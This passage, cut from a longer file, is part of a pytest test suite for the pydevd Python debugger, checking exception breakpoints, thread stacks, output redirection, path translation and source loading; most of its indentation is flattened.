writer.write_run_thread(hit.thread_id)
if not unhandled:
if (IS_PY26 or IS_PY27) and 'listcomp' in target_file:
expected_lines = [
writer.get_line_index_with_content('# call exc'),
]
else:
expected_lines = [
writer.get_line_index_with_content('# exc line'),
writer.get_line_index_with_content('# call exc'),
]
for expected_line in expected_lines:
hit = writer.wait_for_breakpoint_hit(REASON_CAUGHT_EXCEPTION)
assert hit.line == expected_line
writer.write_get_current_exception(hit.thread_id)
msg = writer.wait_for_message(accept_message=lambda msg:'exc_type="' in msg and 'exc_desc="' in msg, unquote_msg=False)
                frame_names = [unquote(f['name']).replace('&lt;', '<').replace('&gt;', '>') for f in msg.thread.frame]
assert frame_names == expected_frame_names
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Failing on Jython -- needs to be investigated.')
def test_unhandled_exceptions_basic(case_setup):
def check_test_suceeded_msg(writer, stdout, stderr):
# Don't call super (we have an unhandled exception in the stack trace).
return 'TEST SUCEEDED' in ''.join(stdout) and 'TEST SUCEEDED' in ''.join(stderr)
def additional_output_checks(writer, stdout, stderr):
if 'raise Exception' not in stderr:
raise AssertionError('Expected test to have an unhandled exception.\nstdout:\n%s\n\nstderr:\n%s' % (
stdout, stderr))
with case_setup.test_file(
'_debugger_case_unhandled_exceptions.py',
check_test_suceeded_msg=check_test_suceeded_msg,
additional_output_checks=additional_output_checks,
EXPECTED_RETURNCODE=1,
) as writer:
writer.write_add_exception_breakpoint_with_policy('Exception', "0", "1", "0")
writer.write_make_initial_run()
def check(hit, exc_type, exc_desc):
writer.write_get_current_exception(hit.thread_id)
msg = writer.wait_for_message(accept_message=lambda msg:exc_type in msg and 'exc_type="' in msg and 'exc_desc="' in msg, unquote_msg=False)
assert unquote(msg.thread['exc_desc']) == exc_desc
assert unquote(msg.thread['exc_type']) in (
"<type 'exceptions.%s'>" % (exc_type,), # py2
"<class '%s'>" % (exc_type,) # py3
)
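            # The XML helper exposes a single <frame> as one node (len() == 0, since it has no children)
            # and several frames as a list, hence the branch below.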
if len(msg.thread.frame) == 0:
assert unquote(unquote(msg.thread.frame['file'])).endswith('_debugger_case_unhandled_exceptions.py')
else:
assert unquote(unquote(msg.thread.frame[0]['file'])).endswith('_debugger_case_unhandled_exceptions.py')
writer.write_run_thread(hit.thread_id)
# Will stop in 2 background threads
hit0 = writer.wait_for_breakpoint_hit(REASON_UNCAUGHT_EXCEPTION)
thread_id1 = hit0.thread_id
hit1 = writer.wait_for_breakpoint_hit(REASON_UNCAUGHT_EXCEPTION)
thread_id2 = hit1.thread_id
if hit0.name == 'thread_func2':
check(hit0, 'ValueError', 'in thread 2')
check(hit1, 'Exception', 'in thread 1')
else:
check(hit0, 'Exception', 'in thread 1')
check(hit1, 'ValueError', 'in thread 2')
writer.write_run_thread(thread_id1)
writer.write_run_thread(thread_id2)
# Will stop in main thread
hit = writer.wait_for_breakpoint_hit(REASON_UNCAUGHT_EXCEPTION)
assert hit.name == '<module>'
thread_id3 = hit.thread_id
# Requesting the stack in an unhandled exception should provide the stack of the exception,
# not the current location of the program.
writer.write_get_thread_stack(thread_id3)
msg = writer.wait_for_message(CMD_GET_THREAD_STACK)
assert len(msg.thread.frame) == 0 # In main thread (must have no back frames).
assert msg.thread.frame['name'] == '<module>'
check(hit, 'IndexError', 'in main')
writer.log.append('Marking finished ok.')
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Failing on Jython -- needs to be investigated.')
def test_unhandled_exceptions_in_top_level1(case_setup_unhandled_exceptions):
with case_setup_unhandled_exceptions.test_file(
'_debugger_case_unhandled_exceptions_on_top_level.py',
EXPECTED_RETURNCODE=1,
) as writer:
writer.write_add_exception_breakpoint_with_policy('Exception', "0", "1", "0")
writer.write_make_initial_run()
# Will stop in main thread
hit = writer.wait_for_breakpoint_hit(REASON_UNCAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
writer.log.append('Marking finished ok.')
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Failing on Jython -- needs to be investigated.')
def test_unhandled_exceptions_in_top_level2(case_setup_unhandled_exceptions):
# Note: expecting unhandled exception to be printed to stderr.
def get_environ(writer):
env = os.environ.copy()
curr_pythonpath = env.get('PYTHONPATH', '')
pydevd_dirname = os.path.dirname(writer.get_pydevd_file())
curr_pythonpath = pydevd_dirname + os.pathsep + curr_pythonpath
env['PYTHONPATH'] = curr_pythonpath
return env
def update_command_line_args(writer, args):
        # Start pydevd with '-m' to see how it deals with being called with
# runpy at the start.
assert args[0].endswith('pydevd.py')
args = ['-m', 'pydevd'] + args[1:]
return args
with case_setup_unhandled_exceptions.test_file(
'_debugger_case_unhandled_exceptions_on_top_level.py',
get_environ=get_environ,
update_command_line_args=update_command_line_args,
EXPECTED_RETURNCODE='any',
) as writer:
writer.write_add_exception_breakpoint_with_policy('Exception', "0", "1", "0")
writer.write_make_initial_run()
# Should stop (only once) in the main thread.
hit = writer.wait_for_breakpoint_hit(REASON_UNCAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
writer.log.append('Marking finished ok.')
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Failing on Jython -- needs to be investigated.')
def test_unhandled_exceptions_in_top_level3(case_setup_unhandled_exceptions):
with case_setup_unhandled_exceptions.test_file(
'_debugger_case_unhandled_exceptions_on_top_level.py',
EXPECTED_RETURNCODE=1
) as writer:
# Handled and unhandled
writer.write_add_exception_breakpoint_with_policy('Exception', "1", "1", "0")
writer.write_make_initial_run()
        # Will stop in the main thread twice: once when we find that the exception is being
        # thrown and again in postmortem mode when we discover it's uncaught.
hit = writer.wait_for_breakpoint_hit(REASON_CAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(REASON_UNCAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
writer.log.append('Marking finished ok.')
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Failing on Jython -- needs to be investigated.')
def test_unhandled_exceptions_in_top_level4(case_setup_unhandled_exceptions):
# Note: expecting unhandled exception to be printed to stderr.
with case_setup_unhandled_exceptions.test_file(
'_debugger_case_unhandled_exceptions_on_top_level2.py',
EXPECTED_RETURNCODE=1,
) as writer:
# Handled and unhandled
writer.write_add_exception_breakpoint_with_policy('Exception', "1", "1", "0")
writer.write_make_initial_run()
# We have an exception thrown and handled and another which is thrown and is then unhandled.
hit = writer.wait_for_breakpoint_hit(REASON_CAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(REASON_CAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(REASON_UNCAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
writer.log.append('Marking finished ok.')
writer.finished_ok = True
@pytest.mark.skipif(not IS_CPYTHON, reason='Only for Python.')
def test_case_set_next_statement(case_setup):
with case_setup.test_file('_debugger_case_set_next_statement.py') as writer:
breakpoint_id = writer.write_add_breakpoint(6, None)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT, line=6) # Stop in line a=3 (before setting it)
writer.write_evaluate_expression('%s\t%s\t%s' % (hit.thread_id, hit.frame_id, 'LOCAL'), 'a')
writer.wait_for_evaluation('<var name="a" type="int" qualifier="{0}" value="int: 2"'.format(builtin_qualifier))
writer.write_set_next_statement(hit.thread_id, 2, 'method')
hit = writer.wait_for_breakpoint_hit('127', line=2)
# Check that it's still unchanged
writer.write_evaluate_expression('%s\t%s\t%s' % (hit.thread_id, hit.frame_id, 'LOCAL'), 'a')
writer.wait_for_evaluation('<var name="a" type="int" qualifier="{0}" value="int: 2"'.format(builtin_qualifier))
        # After a step over it should become 1, as we executed the line which sets a = 1
writer.write_step_over(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('108')
writer.write_evaluate_expression('%s\t%s\t%s' % (hit.thread_id, hit.frame_id, 'LOCAL'), 'a')
writer.wait_for_evaluation('<var name="a" type="int" qualifier="{0}" value="int: 1"'.format(builtin_qualifier))
writer.write_remove_breakpoint(breakpoint_id)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_unhandled_exceptions_get_stack(case_setup_unhandled_exceptions):
with case_setup_unhandled_exceptions.test_file(
'_debugger_case_unhandled_exception_get_stack.py',
EXPECTED_RETURNCODE='any',
) as writer:
writer.write_add_exception_breakpoint_with_policy('Exception', "0", "1", "0")
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(REASON_UNCAUGHT_EXCEPTION)
writer.write_get_thread_stack(hit.thread_id)
msg = writer.wait_for_get_thread_stack_message()
files = [frame['file'] for frame in msg.thread.frame]
assert msg.thread['id'] == hit.thread_id
if not files[0].endswith('_debugger_case_unhandled_exception_get_stack.py'):
raise AssertionError('Expected to find _debugger_case_unhandled_exception_get_stack.py in files[0]. Found: %s' % ('\n'.join(files),))
assert len(msg.thread.frame) == 0 # No back frames (stopped in main).
assert msg.thread.frame['name'] == '<module>'
assert msg.thread.frame['line'] == str(writer.get_line_index_with_content('break line on unhandled exception'))
writer.write_run_thread(hit.thread_id)
writer.log.append('Marking finished ok.')
writer.finished_ok = True
@pytest.mark.skipif(not IS_CPYTHON, reason='Only for Python.')
def test_case_get_next_statement_targets(case_setup):
with case_setup.test_file('_debugger_case_get_next_statement_targets.py') as writer:
breakpoint_id = writer.write_add_breakpoint(21, None)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT, line=21)
writer.write_get_next_statement_targets(hit.thread_id, hit.frame_id)
targets = writer.wait_for_get_next_statement_targets()
expected = set((2, 3, 5, 8, 9, 10, 12, 13, 14, 15, 17, 18, 19, 21))
assert targets == expected, 'Expected targets to be %s, was: %s' % (expected, targets)
writer.write_remove_breakpoint(breakpoint_id)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_IRONPYTHON or IS_JYTHON, reason='Failing on IronPython and Jython (needs to be investigated).')
def test_case_type_ext(case_setup):
# Custom type presentation extensions
def get_environ(self):
env = os.environ.copy()
python_path = env.get("PYTHONPATH", "")
ext_base = debugger_unittest._get_debugger_test_file('my_extensions')
env['PYTHONPATH'] = ext_base + os.pathsep + python_path if python_path else ext_base
return env
with case_setup.test_file('_debugger_case_type_ext.py', get_environ=get_environ) as writer:
writer.get_environ = get_environ
writer.write_add_breakpoint(7, None)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit('111')
writer.write_get_frame(hit.thread_id, hit.frame_id)
assert writer.wait_for_var([
[
r'<var name="my_rect" type="Rect" qualifier="__main__" value="Rectangle%255BLength%253A 5%252C Width%253A 10 %252C Area%253A 50%255D" isContainer="True" />',
r'<var name="my_rect" type="Rect" value="Rect: <__main__.Rect object at', # Jython
]
])
writer.write_get_variable(hit.thread_id, hit.frame_id, 'my_rect')
assert writer.wait_for_var(r'<var name="area" type="int" qualifier="{0}" value="int%253A 50" />'.format(builtin_qualifier))
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_IRONPYTHON or IS_JYTHON, reason='Failing on IronPython and Jython (needs to be investigated).')
def test_case_event_ext(case_setup):
def get_environ(self):
env = os.environ.copy()
python_path = env.get("PYTHONPATH", "")
ext_base = debugger_unittest._get_debugger_test_file('my_extensions')
env['PYTHONPATH'] = ext_base + os.pathsep + python_path if python_path else ext_base
env["VERIFY_EVENT_TEST"] = "1"
return env
# Test initialize event for extensions
with case_setup.test_file('_debugger_case_event_ext.py', get_environ=get_environ) as writer:
original_additional_output_checks = writer.additional_output_checks
@overrides(writer.additional_output_checks)
def additional_output_checks(stdout, stderr):
original_additional_output_checks(stdout, stderr)
if 'INITIALIZE EVENT RECEIVED' not in stdout:
raise AssertionError('No initialize event received')
writer.additional_output_checks = additional_output_checks
writer.write_make_initial_run()
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Jython does not seem to be creating thread started inside tracing (investigate).')
def test_case_writer_creation_deadlock(case_setup):
# check case where there was a deadlock evaluating expressions
with case_setup.test_file('_debugger_case_thread_creation_deadlock.py') as writer:
writer.write_add_breakpoint(26, None)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit('111')
        assert hit.line == 26, 'Expected to stop at line 26, was: %s' % (hit.line,)
writer.write_evaluate_expression('%s\t%s\t%s' % (hit.thread_id, hit.frame_id, 'LOCAL'), 'create_thread()')
writer.wait_for_evaluation('<var name="create_thread()" type="str" qualifier="{0}" value="str: create_thread:ok'.format(builtin_qualifier))
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_case_skip_breakpoints_in_exceptions(case_setup):
# Case where breakpoint is skipped after an exception is raised over it
with case_setup.test_file('_debugger_case_skip_breakpoint_in_exceptions.py') as writer:
writer.write_add_breakpoint(5, None)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit('111', line=5)
writer.write_run_thread(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('111', line=5)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_case_handled_exceptions0(case_setup):
# Stop only once per handled exception.
with case_setup.test_file('_debugger_case_exceptions.py') as writer:
writer.write_set_project_roots([os.path.dirname(writer.TEST_FILE)])
writer.write_add_exception_breakpoint_with_policy(
'IndexError',
notify_on_handled_exceptions=2, # Notify only once
notify_on_unhandled_exceptions=0,
ignore_libraries=1
)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(
REASON_CAUGHT_EXCEPTION,
line=writer.get_line_index_with_content('raise indexerror line')
)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Not working on Jython (needs to be investigated).')
def test_case_handled_exceptions1(case_setup):
# Stop multiple times for the same handled exception.
def get_environ(self):
env = os.environ.copy()
env["IDE_PROJECT_ROOTS"] = os.path.dirname(self.TEST_FILE)
return env
with case_setup.test_file('_debugger_case_exceptions.py', get_environ=get_environ) as writer:
writer.write_add_exception_breakpoint_with_policy(
'IndexError',
notify_on_handled_exceptions=1, # Notify multiple times
notify_on_unhandled_exceptions=0,
ignore_libraries=1
)
writer.write_make_initial_run()
def check(hit):
writer.write_get_frame(hit.thread_id, hit.frame_id)
writer.wait_for_message(accept_message=lambda msg:'__exception__' in msg and 'IndexError' in msg, unquote_msg=False)
writer.write_get_current_exception(hit.thread_id)
msg = writer.wait_for_message(accept_message=lambda msg:'IndexError' in msg and 'exc_type="' in msg and 'exc_desc="' in msg, unquote_msg=False)
assert msg.thread['exc_desc'] == 'foo'
assert unquote(msg.thread['exc_type']) in (
"<type 'exceptions.IndexError'>", # py2
"<class 'IndexError'>" # py3
)
assert unquote(unquote(msg.thread.frame[0]['file'])).endswith('_debugger_case_exceptions.py')
writer.write_run_thread(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(
REASON_CAUGHT_EXCEPTION, line=writer.get_line_index_with_content('raise indexerror line'))
check(hit)
hit = writer.wait_for_breakpoint_hit(
REASON_CAUGHT_EXCEPTION, line=writer.get_line_index_with_content('reraise on method2'))
check(hit)
hit = writer.wait_for_breakpoint_hit(
REASON_CAUGHT_EXCEPTION, line=writer.get_line_index_with_content('handle on method1'))
check(hit)
writer.finished_ok = True
def test_case_handled_exceptions2(case_setup):
# No IDE_PROJECT_ROOTS set.
def get_environ(self):
env = os.environ.copy()
# Don't stop anywhere (note: setting IDE_PROJECT_ROOTS = '' would consider
# anything not under site-packages as being in the project).
env["IDE_PROJECT_ROOTS"] = '["empty"]'
return env
with case_setup.test_file('_debugger_case_exceptions.py', get_environ=get_environ) as writer:
writer.write_add_exception_breakpoint_with_policy(
'IndexError',
notify_on_handled_exceptions=1, # Notify multiple times
notify_on_unhandled_exceptions=0,
ignore_libraries=1
)
writer.write_make_initial_run()
writer.finished_ok = True
def test_case_handled_exceptions3(case_setup):
# Stop directly on the line that raises the exception (skip_on_exceptions_thrown_in_same_context=False).
def get_environ(self):
env = os.environ.copy()
env["IDE_PROJECT_ROOTS"] = os.path.dirname(self.TEST_FILE)
return env
with case_setup.test_file('_debugger_case_exceptions.py', get_environ=get_environ) as writer:
# Note: in this mode we'll only stop once.
writer.write_set_py_exception_globals(
break_on_uncaught=False,
break_on_caught=True,
skip_on_exceptions_thrown_in_same_context=False,
ignore_exceptions_thrown_in_lines_with_ignore_exception=True,
ignore_libraries=True,
exceptions=('IndexError',)
)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(
REASON_CAUGHT_EXCEPTION, line=writer.get_line_index_with_content('raise indexerror line'))
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_case_handled_exceptions4(case_setup):
# Don't stop on exception thrown in the same context (only at caller).
def get_environ(self):
env = os.environ.copy()
env["IDE_PROJECT_ROOTS"] = os.path.dirname(self.TEST_FILE)
return env
with case_setup.test_file('_debugger_case_exceptions.py', get_environ=get_environ) as writer:
# Note: in this mode we'll only stop once.
writer.write_set_py_exception_globals(
break_on_uncaught=False,
break_on_caught=True,
skip_on_exceptions_thrown_in_same_context=True,
ignore_exceptions_thrown_in_lines_with_ignore_exception=True,
ignore_libraries=True,
exceptions=('IndexError',)
)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(
REASON_CAUGHT_EXCEPTION, line=writer.get_line_index_with_content('reraise on method2'))
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_case_settrace(case_setup):
with case_setup.test_file('_debugger_case_settrace.py') as writer:
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit('108', line=12)
writer.write_run_thread(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(line=7)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(True or IS_PY26 or IS_JYTHON, reason='This is *very* flaky. Scapy only supports 2.7 onwards, not available for jython.')
def test_case_scapy(case_setup):
with case_setup.test_file('_debugger_case_scapy.py') as writer:
writer.FORCE_KILL_PROCESS_WHEN_FINISHED_OK = True
writer.reader_thread.set_messages_timeout(30) # Starting scapy may be slow (timed out with 15 seconds on appveyor).
writer.write_add_breakpoint(2, None)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
frame_id = hit.frame_id
writer.write_run_thread(thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_APPVEYOR or IS_JYTHON, reason='Flaky on appveyor / Jython encoding issues (needs investigation).')
def test_redirect_output(case_setup):
def get_environ(writer):
env = os.environ.copy()
env["PYTHONIOENCODING"] = 'utf-8'
return env
with case_setup.test_file('_debugger_case_redirect.py', get_environ=get_environ) as writer:
original_ignore_stderr_line = writer._ignore_stderr_line
@overrides(writer._ignore_stderr_line)
def _ignore_stderr_line(line):
if original_ignore_stderr_line(line):
return True
binary_junk = b'\xe8\xF0\x80\x80\x80'
if sys.version_info[0] >= 3:
binary_junk = binary_junk.decode('utf-8', 'replace')
return line.startswith((
'text',
'binary',
'a',
binary_junk,
))
writer._ignore_stderr_line = _ignore_stderr_line
# Note: writes to stdout and stderr are now synchronous (so, the order
# must always be consistent and there's a message for each write).
expected = [
'text\n',
'binary or text\n',
'ação1\n',
]
if sys.version_info[0] >= 3:
expected.extend((
'binary\n',
'ação2\n'.encode(encoding='latin1').decode('utf-8', 'replace'),
'ação3\n',
))
binary_junk = '\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\n\n'
if sys.version_info[0] >= 3:
binary_junk = "\ufffd\ufffd\ufffd\ufffd\ufffd\n\n"
expected.append(binary_junk)
new_expected = [(x, 'stdout') for x in expected]
new_expected.extend([(x, 'stderr') for x in expected])
writer.write_start_redirect()
writer.write_make_initial_run()
msgs = []
ignored = []
while len(msgs) < len(new_expected):
try:
msg = writer.wait_for_output()
except AssertionError:
for msg in msgs:
sys.stderr.write('Found: %s\n' % (msg,))
for msg in new_expected:
sys.stderr.write('Expected: %s\n' % (msg,))
for msg in ignored:
sys.stderr.write('Ignored: %s\n' % (msg,))
raise
if msg not in new_expected:
ignored.append(msg)
continue
msgs.append(msg)
if msgs != new_expected:
print(msgs)
print(new_expected)
assert msgs == new_expected
writer.finished_ok = True
def _path_equals(path1, path2):
path1 = pydevd_file_utils.normcase(path1)
path2 = pydevd_file_utils.normcase(path2)
return path1 == path2
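# PATHS_FROM_ECLIPSE_TO_PYTHON maps (client path, server path) pairs: the test below adds
# breakpoints using the client-side path and expects hits and loaded sources to be reported
# back with that same client-side path (optionally with mixed casing on Windows).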
@pytest.mark.parametrize('mixed_case', [True, False] if sys.platform == 'win32' else [False])
def test_path_translation(case_setup, mixed_case):
def get_file_in_client(writer):
# Instead of using: tests_python/_debugger_case_path_translation.py
# we'll set the breakpoints at foo/_debugger_case_path_translation.py
file_in_client = os.path.dirname(os.path.dirname(writer.TEST_FILE))
return os.path.join(os.path.dirname(file_in_client), 'foo', '_debugger_case_path_translation.py')
def get_environ(writer):
import json
env = os.environ.copy()
env["PYTHONIOENCODING"] = 'utf-8'
assert writer.TEST_FILE.endswith('_debugger_case_path_translation.py')
file_in_client = get_file_in_client(writer)
if mixed_case:
new_file_in_client = ''.join([file_in_client[i].upper() if i % 2 == 0 else file_in_client[i].lower() for i in range(len(file_in_client))])
assert _path_equals(file_in_client, new_file_in_client)
env["PATHS_FROM_ECLIPSE_TO_PYTHON"] = json.dumps([
(
os.path.dirname(file_in_client),
os.path.dirname(writer.TEST_FILE)
)
])
return env
with case_setup.test_file('_debugger_case_path_translation.py', get_environ=get_environ) as writer:
from tests_python.debugger_unittest import CMD_LOAD_SOURCE
writer.write_start_redirect()
file_in_client = get_file_in_client(writer)
assert 'tests_python' not in file_in_client
writer.write_add_breakpoint(
writer.get_line_index_with_content('break here'), 'call_this', filename=file_in_client)
writer.write_make_initial_run()
xml = writer.wait_for_message(lambda msg:'stop_reason="111"' in msg)
assert xml.thread.frame[0]['file'] == file_in_client
thread_id = xml.thread['id']
# Request a file that exists
files_to_match = [file_in_client]
if IS_WINDOWS:
files_to_match.append(file_in_client.upper())
for f in files_to_match:
writer.write_load_source(f)
writer.wait_for_message(
lambda msg:
'%s\t' % CMD_LOAD_SOURCE in msg and \
"def main():" in msg and \
"print('break here')" in msg and \
"print('TEST SUCEEDED!')" in msg
, expect_xml=False)
# Request a file that does not exist
writer.write_load_source(file_in_client + 'not_existent.py')
writer.wait_for_message(
lambda msg:'901\t' in msg and ('FileNotFoundError' in msg or 'IOError' in msg),
expect_xml=False)
writer.write_run_thread(thread_id)
writer.finished_ok = True
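# The next two tests request source through CMD_LOAD_SOURCE_FROM_FRAME_ID for frames whose
# 'file' is a pseudo-name ('<foo bar>' / '<something>'): the first relies on linecache-provided
# source, the second on the bytecode-based fallback (as the test names suggest).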
@pytest.mark.skipif(not IS_CPYTHON, reason='CPython only test.')
def test_linecache_xml(case_setup, tmpdir):
from _pydevd_bundle.pydevd_comm_constants import CMD_LOAD_SOURCE_FROM_FRAME_ID
with case_setup.test_file('_debugger_case_linecache.py') as writer:
writer.write_add_breakpoint(writer.get_line_index_with_content('breakpoint'))
writer.write_make_initial_run()
# First hit is for breakpoint reached via a stack frame that doesn't have source.
hit = writer.wait_for_breakpoint_hit()
writer.write_get_thread_stack(hit.thread_id)
msg = writer.wait_for_get_thread_stack_message()
frame_ids = set()
for frame in msg.thread.frame:
if frame['file'] == '<foo bar>':
frame_ids.add(frame['id'])
assert len(frame_ids) == 2
for frame_id in frame_ids:
writer.write_load_source_from_frame_id(frame_id)
writer.wait_for_message(
lambda msg:
'%s\t' % CMD_LOAD_SOURCE_FROM_FRAME_ID in msg and (
"[x for x in range(10)]" in msg and "def somemethod():" in msg
)
, expect_xml=False)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(not IS_CPYTHON, reason='CPython only test.')
def test_show_bytecode_xml(case_setup, tmpdir):
from _pydevd_bundle.pydevd_comm_constants import CMD_LOAD_SOURCE_FROM_FRAME_ID
with case_setup.test_file('_debugger_case_show_bytecode.py') as writer:
writer.write_add_breakpoint(writer.get_line_index_with_content('breakpoint'))
writer.write_make_initial_run()
# First hit is for breakpoint reached via a stack frame that doesn't have source.
hit = writer.wait_for_breakpoint_hit()
writer.write_get_thread_stack(hit.thread_id)
msg = writer.wait_for_get_thread_stack_message()
frame_ids = set()
for frame in msg.thread.frame:
if frame['file'] == '<something>':
frame_ids.add(frame['id'])
assert len(frame_ids) == 2
for frame_id in frame_ids:
writer.write_load_source_from_frame_id(frame_id)
writer.wait_for_message(
lambda msg:
'%s\t' % CMD_LOAD_SOURCE_FROM_FRAME_ID in msg and (
"MyClass" in msg or "foo()" in msg
)
, expect_xml=False)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_evaluate_errors(case_setup):
with case_setup.test_file('_debugger_case_local_variables.py') as writer:
writer.write_add_breakpoint(writer.get_line_index_with_content('Break here'), 'Call')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
frame_id = hit.frame_id
writer.write_evaluate_expression('%s\t%s\t%s' % (thread_id, frame_id, 'LOCAL'), 'name_error')
writer.wait_for_evaluation('<var name="name_error" type="NameError"')
writer.write_run_thread(thread_id)
writer.finished_ok = True
def test_list_threads(case_setup):
with case_setup.test_file('_debugger_case_local_variables.py') as writer:
writer.write_add_breakpoint(writer.get_line_index_with_content('Break here'), 'Call')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
frame_id = hit.frame_id
seq = writer.write_list_threads()
msg = writer.wait_for_list_threads(seq)
assert msg.thread['name'] == 'MainThread'
assert msg.thread['id'].startswith('pid')
writer.write_run_thread(thread_id)
writer.finished_ok = True
def test_case_print(case_setup):
with case_setup.test_file('_debugger_case_print.py') as writer:
writer.write_add_breakpoint(1, 'None')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
frame_id = hit.frame_id
writer.write_run_thread(thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Not working on Jython (needs to be investigated).')
def test_case_lambda(case_setup):
with case_setup.test_file('_debugger_case_lamda.py') as writer:
writer.write_add_breakpoint(writer.get_line_index_with_content('Break here'), 'None')
writer.write_make_initial_run()
for _ in range(3): # We'll hit the same breakpoint 3 times.
hit = writer.wait_for_breakpoint_hit()
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Not working properly on Jython (needs investigation).')
def test_case_suspension_policy(case_setup):
with case_setup.test_file('_debugger_case_suspend_policy.py') as writer:
writer.write_add_breakpoint(25, '', suspend_policy='ALL')
writer.write_make_initial_run()
thread_ids = []
for i in range(3):
writer.log.append('Waiting for thread %s of 3 to stop' % (i + 1,))
# One thread is suspended with a breakpoint hit and the other 2 as thread suspended.
hit = writer.wait_for_breakpoint_hit((REASON_STOP_ON_BREAKPOINT, REASON_THREAD_SUSPEND))
thread_ids.append(hit.thread_id)
for thread_id in thread_ids:
writer.write_run_thread(thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Flaky on Jython (needs investigation).')
def test_case_get_thread_stack(case_setup):
with case_setup.test_file('_debugger_case_get_thread_stack.py') as writer:
original_ignore_stderr_line = writer._ignore_stderr_line
@overrides(writer._ignore_stderr_line)
def _ignore_stderr_line(line):
if original_ignore_stderr_line(line):
return True
if IS_JYTHON:
for expected in (
"RuntimeWarning: Parent module '_pydev_bundle' not found while handling absolute import",
"from java.lang import System"):
if expected in line:
return True
return False
writer._ignore_stderr_line = _ignore_stderr_line
writer.write_add_breakpoint(18, None)
writer.write_make_initial_run()
thread_created_msgs = [writer.wait_for_message(CMD_THREAD_CREATE)]
thread_created_msgs.append(writer.wait_for_message(CMD_THREAD_CREATE))
thread_id_to_name = {}
for msg in thread_created_msgs:
thread_id_to_name[msg.thread['id']] = msg.thread['name']
assert len(thread_id_to_name) == 2
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT)
assert hit.thread_id in thread_id_to_name
for request_thread_id in thread_id_to_name:
writer.write_get_thread_stack(request_thread_id)
msg = writer.wait_for_get_thread_stack_message()
files = [frame['file'] for frame in msg.thread.frame]
assert msg.thread['id'] == request_thread_id
if not files[0].endswith('_debugger_case_get_thread_stack.py'):
raise AssertionError('Expected to find _debugger_case_get_thread_stack.py in files[0]. Found: %s' % ('\n'.join(files),))
if any(filename.endswith('pydevd.py') for filename in files):
raise AssertionError('Did not expect to find pydevd.py. Found: %s' % ('\n'.join(files),))
if request_thread_id == hit.thread_id:
assert len(msg.thread.frame) == 0 # In main thread (must have no back frames).
assert msg.thread.frame['name'] == '<module>'
else:
assert len(msg.thread.frame) > 1 # Stopped in threading (must have back frames).
assert msg.thread.frame[0]['name'] == 'method'
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_case_dump_threads_to_stderr(case_setup):
from tests_python.debugger_unittest import wait_for_condition
def additional_output_checks(writer, stdout, stderr):
assert is_stderr_ok(stderr), make_error_msg(stderr)
def make_error_msg(stderr):
return 'Did not find thread dump in stderr. stderr:\n%s' % (stderr,)
def is_stderr_ok(stderr):
return 'Thread Dump' in stderr and 'Thread pydevd.CommandThread (daemon: True, pydevd thread: True)' in stderr
with case_setup.test_file(
'_debugger_case_get_thread_stack.py', additional_output_checks=additional_output_checks) as writer:
writer.write_add_breakpoint(12, None)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT)
writer.write_dump_threads()
wait_for_condition(
lambda: is_stderr_ok(writer.get_stderr()),
lambda: make_error_msg(writer.get_stderr())
)
